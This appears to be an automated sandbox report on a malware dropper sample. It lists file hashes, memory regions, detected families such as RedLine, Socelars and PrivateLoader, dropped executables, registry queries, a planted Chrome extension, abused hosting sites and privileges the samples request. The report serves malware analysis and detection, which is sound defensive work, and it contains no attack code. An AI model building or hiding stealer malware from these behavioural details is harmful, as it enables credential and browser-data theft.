SHA256 54bb52c4274084187e980c025a90d0ff3d5c4057cfda4ff71744925537c0e2d4
SHA512 760e50d683ff79579b4009860287ed8ff32241687f181981e26f33dfdd7277f6c89f93c25bb5054e1bb526b3e328a8ef96f80bba66af5cce583548832d98da58

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14514904a4b.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1481f5a7e3eccdd.exe

MD5 9b07fc470646ce890bcb860a5fb55f13
SHA1 ef01d45abaf5060a0b32319e0509968f6be3082f
SHA256 506c6ee68b29701403739da25679b640d21b1b121f45dde5bc25705901a6ed0b
SHA512 4cc1b725c6fb539d832d2d5315bbc63e967a41129d25c2102b2df19e4931e4e06c2a9f70a3336d98b9e031c636d021e713f10dbbd86a57f447a7581221a470cc

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat144474a564d26f29.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/3012-136-0x0000000000170000-0x0000000000188000-memory.dmp

memory/2548-135-0x0000000000AB0000-0x0000000000AB8000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat1487ca754e680f91.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/2188-141-0x00000000011A0000-0x0000000001208000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat142ac5249376e895.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/1276-156-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3012-155-0x0000000000160000-0x0000000000166000-memory.dmp

memory/1084-154-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1780-153-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

MD5 a1d90c2ea649aae4d9492b584c52ef5c
SHA1 32969454090b6dd84a9b97d19bd58845cda5aae6
SHA256 64f7fc506342b8fd9bf09d45a012f9c996237e06cffbade5d3aedb1c8d967023
SHA512 09bf2aa523933dc05fb23a6d97f56ba33ba5894667b62f2275a4e94b86e9ac82d6faeda7dfdc0ac1c966fe13b0be29ae98158850d815021bd88837a3453b6e73

C:\Users\Admin\AppData\Local\Temp\is-S2RMT.tmp\Sat1481f5a7e3eccdd.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14f1396dfcf191bd.exe

MD5 15c6dc87edd001c0bf0df6f9405ad7db
SHA1 9582017cd83642ffdac143daeed13e840f4b2350
SHA256 5e7a5af6e0cea11934feaa716867e906644eb20df743b1c5fa85558de0c1b10d
SHA512 6fffd09475af31c9cdc56f561c13921975c236c6590ede369e5d863469452a6224d2ee9550d9f73fb65696c9d46185e487bf0764922c95831882a8029151603f

C:\Users\Admin\AppData\Local\Temp\is-8PO24.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-8PO24.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14a7594cc5a0116.exe

MD5 492fe12bd7a2ea0ba1d2a5672f5a013a
SHA1 934a18ff3f83a43ce8c4a3cacba0d30d82c4276c
SHA256 45e13af971ea12864fd315f67096d0547bee1e07994f16bfedba10ca5beaad0f
SHA512 de5c99a7e20949bcd75bde8d971b343a6bae5255b5d46dd9472fde13ab0c3b4ce317eaf44527f79a113e2bd0b0efb0d19a5a53834e9b28a41b4885a888bcfd67

memory/2704-182-0x0000000000B10000-0x0000000000CB8000-memory.dmp

memory/2812-217-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-216-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2812-215-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-213-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2812-210-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2812-209-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2744-208-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2744-206-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2744-205-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2744-204-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2744-202-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2744-200-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2744-198-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2744-196-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2704-218-0x0000000002AE0000-0x0000000002B85000-memory.dmp

memory/2704-222-0x0000000002B90000-0x0000000002C22000-memory.dmp

memory/2704-219-0x0000000002B90000-0x0000000002C22000-memory.dmp

memory/1844-227-0x0000000000400000-0x0000000000883000-memory.dmp

memory/2208-226-0x0000000000400000-0x000000000089C000-memory.dmp

memory/2704-230-0x0000000000B10000-0x0000000000CB8000-memory.dmp

memory/1000-229-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1276-228-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2208-232-0x0000000000400000-0x000000000089C000-memory.dmp

memory/2704-240-0x0000000002B90000-0x0000000002C22000-memory.dmp

memory/2704-241-0x0000000002C30000-0x00000000049DF000-memory.dmp

memory/2704-242-0x00000000049E0000-0x0000000004A6C000-memory.dmp

memory/2704-244-0x0000000004A70000-0x0000000004AF9000-memory.dmp

memory/2704-246-0x0000000004A70000-0x0000000004AF9000-memory.dmp

memory/2704-243-0x0000000004A70000-0x0000000004AF9000-memory.dmp

memory/2704-247-0x00000000001E0000-0x00000000001E1000-memory.dmp

memory/2704-248-0x00000000001F0000-0x00000000001F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabF344.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-23 18:41

Reported

2024-11-23 18:43

Platform

win10v2004-20241007-en

Max time kernel

77s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-Q0LEB.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14f1396dfcf191bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14d32a38896785b13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14514904a4b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-Q0LEB.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-77CHV.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4080 set thread context of 4552 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-Q0LEB.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-77CHV.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133768609177181217" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14d32a38896785b13.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
